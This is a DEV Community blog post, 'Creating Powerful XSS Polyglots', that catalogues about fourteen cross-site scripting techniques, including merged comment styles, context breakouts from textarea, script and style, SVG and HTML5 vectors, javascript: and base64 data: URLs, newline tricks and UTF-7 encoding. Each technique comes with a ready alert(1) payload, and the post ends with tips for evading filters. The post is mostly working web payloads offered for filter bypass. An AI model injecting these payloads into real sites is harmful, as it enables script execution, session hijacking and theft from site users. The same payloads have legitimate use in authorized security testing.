DEV Community

Mrhili Mohamed Amine
Mrhili Mohamed Amine

Posted on

1

Creating Powerful XSS Polyglots

Polyglot payloads leverage multiple encoding, injection, and obfuscation techniques to bypass filters, confuse parsers, and trigger execution across different contexts like HTML, JavaScript, CSS, JSON, etc.

-Merging Comment Styles
Polyglots often confuse parsers by merging different comment styles:

JavaScript: //, /* */
HTML: <!-- -->

<!--<script>/*--><svg onload=alert(1)/*</script>-->
Enter fullscreen mode Exit fullscreen mode

-Using Encoded Entities
Bypassing filters using HTML or URL encoding:

HTML: &lt;, &gt;, &quot;
URL: %3C, %3E, %22
Enter fullscreen mode Exit fullscreen mode
&lt;script&gt;alert(1)&lt;/script&gt;
Enter fullscreen mode Exit fullscreen mode

-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.

"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--
Enter fullscreen mode Exit fullscreen mode

-Breaking Out of Contexts
Escape from current contexts like textarea, script, or style.

</textarea><svg onload=alert(1)>
Enter fullscreen mode Exit fullscreen mode

-Abusing HTML5 Elements
Using modern elements like , , or .

<svg onload=alert(1)></svg>
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
<math><mtext><script>alert(1)</script></mtext></math>
Enter fullscreen mode Exit fullscreen mode

-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.

<div class="x" onmouseover="alert(1)">
Enter fullscreen mode Exit fullscreen mode

-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript.

</style><script>alert(1)</script><style>
Enter fullscreen mode Exit fullscreen mode

-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.

<svg><image href="javascript:alert(1)"></svg>
Enter fullscreen mode Exit fullscreen mode

-Protocol Confusion (Data URLs, JavaScript URLs)
Use javascript: or data: URLs for payload delivery.

<a href="javascript:alert(1)">Click me</a>

<iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>
Enter fullscreen mode Exit fullscreen mode

-Breaking with Newline Characters
Using newlines \n or carriage returns \r to bypass filters.

"onmouseover=\nalert(1)//"
Enter fullscreen mode Exit fullscreen mode

-Polyglot Structures
Payloads that work across multiple languages like CSS and JavaScript.

*/ alert(1) /*
Enter fullscreen mode Exit fullscreen mode

-UTF-7 Encoding
Using less common encodings like UTF-7.

+ADw-script+AD4-alert(1)+ADw-/script+AD4-
Enter fullscreen mode Exit fullscreen mode

-Using HTML5 Injection Vectors
Use modern HTML5 vectors like srcdoc, formaction, or sandbox.

<iframe srcdoc="<script>alert(1)</script>"></iframe>
Enter fullscreen mode Exit fullscreen mode

-Multiple Closings & Layering
Close different tags to break out of nested contexts.

</textarea></script></iframe><svg onload=alert(1)>
Enter fullscreen mode Exit fullscreen mode

Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use multiple elements like , , <script>.<br> Encoding: Use HTML or URL encoding to bypass filters.<br> Event Handlers: Combine with event handlers like onmouseover, onload.<br> Context Escaping: Focus on breaking out of strings, attributes, or tags.<br> Minimize Payload Length: Keep payloads short to bypass length restrictions.<br> These techniques show how polyglot payloads can bypass modern filters by using multiple languages and contexts.</p>

Do your career a big favor. Join DEV. (The website you're on right now)

It takes one minute, it's free, and is worth it for your career.

Get started

Community matters

Top comments (0)

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

πŸ‘‹ Kindness is contagious

Dive into an ocean of knowledge with this thought-provoking post, revered deeply within the supportive DEV Community. Developers of all levels are welcome to join and enhance our collective intelligence.

Saying a simple "thank you" can brighten someone's day. Share your gratitude in the comments below!

On DEV, sharing ideas eases our path and fortifies our community connections. Found this helpful? Sending a quick thanks to the author can be profoundly valued.

Okay